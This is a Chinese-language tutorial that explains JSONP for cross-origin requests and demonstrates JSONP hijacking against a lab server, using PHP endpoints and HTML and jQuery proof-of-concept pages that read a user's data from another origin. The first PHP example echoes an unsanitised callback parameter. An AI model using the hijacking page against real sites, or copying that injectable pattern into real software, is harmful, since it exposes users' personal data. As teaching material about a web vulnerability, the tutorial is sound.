关于jsonp
JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 <script></script>元素标签,远程调用 JSON 文件来实现数据传递。如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ):
{"id" : "1","name" : "原来是老王"}
那么他们可以首先通过 JSONP 的“ Padding ”这个 getUsers.JSON 输出为:
callback({"id" : "1","name" : "原来是老王"});
对于实际应用过程中 callback 的名称在后台实现是动态输出的。如上面例子在 PHP 实现:
<?php
//getUsers.php
$callback = $_GET['callback'];
print $callback.'({"id" : "1","name" : "原来是老王"});';
?>
然后在 a.com 使用 <script> 进行远程调用,在 Jquery 里可以直接这样调用:
<script type="text/javascript" src="http://mini.jiasule.com/framework/jquery/1.9.1/jquery-1.9.1.js"></script>
<script type="text/javascript">
$.getJSON("http://www.b.com/getUsers.php?callback=?", function(getUsers){
alert(getUsers.name);
});
</script>
JSONP劫持漏洞实例
getUser.php
<?php
header('Content-type: application/json');
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名
//json数据
//$json_data = '["id","user"]';
$json_data='({"id":"1","name":"原来是老王"})';
echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格式的数据
?>
客户端实现 callbackFunction 函数实现劫持
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持测试</title>
</head>
<body>
<script type="text/javascript">
function callbackFunction(result)
{
alert(result.name);
}
</script>
<script type="text/javascript" src="http://10.10.10.113/jsonp/getUser.php?jsoncallback=callbackFunction"></script>
</body>
</html>
jQuery 使用 JSONP
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持测试</title>
<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>
</head>
<body>
<div id="divCustomers"></div>
<script type="text/javascript">
$.getJSON("http://10.10.10.113/jsonp/getUser.php?jsoncallback=?", function(getUsers){
alert(getUsers.name);
});
</script>
</body>
</html>
网友评论